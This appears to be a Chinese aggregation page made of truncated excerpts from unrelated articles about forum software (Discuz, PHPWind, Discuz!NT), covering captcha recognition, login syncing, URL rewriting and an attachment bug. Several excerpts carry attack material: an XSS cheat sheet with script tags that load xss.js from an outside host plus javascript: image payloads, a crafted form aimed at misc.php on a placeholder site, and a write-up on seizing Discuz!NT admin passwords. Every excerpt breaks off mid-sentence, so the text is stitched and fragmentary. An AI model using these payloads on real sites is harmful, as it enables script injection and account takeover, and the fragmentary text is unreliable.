对于比较复杂的验证码,比如DZ论坛最新的验证码,处理起来相对麻烦一些,但是原理还是和普通的识别一样的,无非多了个背景处理的方案,看如下对DZ论坛的验证码的识别的思路首先我们要去除它的背景,对于这样稍微复杂的背景,用过去的方法很难做到,上图的例子还不是很明显,我发现很多图片背景色和字母色近似,而且字母颜色是不断变化的,背景也是不断变化的那我初始的想法是找到图片中使用颜色最多的方法,于是我们用HSL表示各点颜色,接着进行统计,得到最大的几个峰值,这里便是图片中几个最丰富的颜色的L值得累加值其余的都可以认为是噪
上次成功升级了最土商业版,接下来就是整合公司的社区网站,先说明一下我现在工作的地方是个地方社区网站,用的基础程序是PHPWind,我的任务就是让PHPWind和最土登录同步,领导也知道我的技术能力有限,不怎么高要求,所以让我先实现,再考虑其他。赶鸭子上架,开工了。 在我未成熟的程序思考能力下,我首先否定了重写程序这个方法,再次否定了将PHPWind的验证方法引入到最土的方法,最后想出一个折中的办法,将两张表的唯一ID相同:将PHPWind用户表设为主表,最土用户表为外接表,让最土用户ID和PHPWind用
Discuz!NT是一款功能强大的基于ASP.net平台的BBS系统,占有不少的市场份额,特别是一些大中型专业社区都采用该系统。最近,ISTO成员在其最新的2.5版本中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。下面笔者部署环境解析该漏洞,以期引起大家的重视。 环境描述操作系统:Windows 2003Discuz!NT版本:2.5URL:http://www.gslw.com数据库:SQL Server 20051、漏洞起因漏洞是由showuse
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javascript:alert(‘XSS’)> (4)IMG标签大小写不敏感 <IMG SRC=JaVaSc
第一种方法: 先注册个用户然后把 <form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data"> 帖子ID,指定一个存在的帖子即可:<input type="text" name="tid" value="1" /> <input typ
IIS虚拟主机支持.htaccess实现URL重写 到这里下载合适的版本 http://www.helicontech.com/download.htm 下载手动安装包ISAPI_Rewrite3_0042_manual.exe 需要手工解压到服务器的一个目录中。 打开IIS管理器 -> 选择网站属性 -> ISAPI筛选器 -> 在名称中输入ISAPI_Rewrite 可执行文件选择刚才解压后的文件ISAPI_Rewrite.dll -> 点确定-> 再点确定 关闭属性对话
在Google上搜索的资料很多人都说nginx目前不支持.htaccess文件,我按照nginx的规则试验了一下,结果发现nginx是完全支持.htaccess文件的! 方法如下: 1. 在需要使用.htaccess文件的目录下新建一个.htaccess文件, 如本人的一个Discuz论坛目录: 复制代码 代码如下:vim /var/www/html/168pc/bbs/.htaccess 2. 在里面输入规则,我这里输入Discuz的伪静态规则: 复制代码 代码如下: # nginx rewrite r
说明 discuz在发表帖子的时候,添加多张图片,然后直接发表帖子,图片顺序有时候会乱掉 即使上传图片窗口中图片顺序正确,发布之后还是会乱掉 分析 看url,程序代码中看不出什么 将图片名改为序号上传,顺序乱了,记下帖子中乱掉的图片顺序为:76123458 然后在数据库找到bbs_forum_attachment_1表,发现默认的顺序也为此:竟然也不按aid排序,有可能取的时候就直接取了没有order by 找到直接操作此表的php:source\class\table\table_forum_attac